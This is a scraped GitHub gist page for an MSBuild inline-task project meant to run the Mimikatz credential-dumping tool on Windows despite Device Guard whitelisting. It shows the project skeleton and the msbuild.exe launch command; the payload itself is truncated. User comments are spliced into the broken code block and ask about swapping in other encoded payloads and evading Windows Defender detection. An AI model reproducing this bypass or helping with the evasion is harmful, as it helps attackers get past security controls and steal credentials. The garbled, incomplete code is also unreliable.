Create a gist now

Instantly share code, notes, and snippets.

@subTee /katz.csproj Secret
Last active Jul 22, 2017

What would you like to do?
Mimikatz On Device Guard - Using MSBuild Bypass
This file has been truncated, but you can view the full file.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.csproj -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Using Namespace="System.Reflection" />
<Code Type="Fragment" Language="cs">
<![CDATA[

H1d3r commented Sep 14, 2016

It seems that code was not complete?

]]>

Code is not complete!!!!

even with add ]]> or "]]> still giving out error about UsingTask,Task and code elements not completed .. also with closing them with , and won't compiling.. anyone figured out why )?

3gstudent commented Sep 20, 2016 edited

Try my test code :)It just integrates two project of Casey's github. The code is all belong to him.

https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20mimikatz.xml

Owner

subTee commented Sep 22, 2016

Fixed Code - It was truncated...

bokandbok commented Dec 16, 2016 edited

Can the mimikatz payload be replaced with other arbitrary executable payload(in Base64-encoded form)?

Getting detected by Windows Defender in Win 10 as HackTool:Win32/Mikatz/dha .. anyway to bypass ..?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment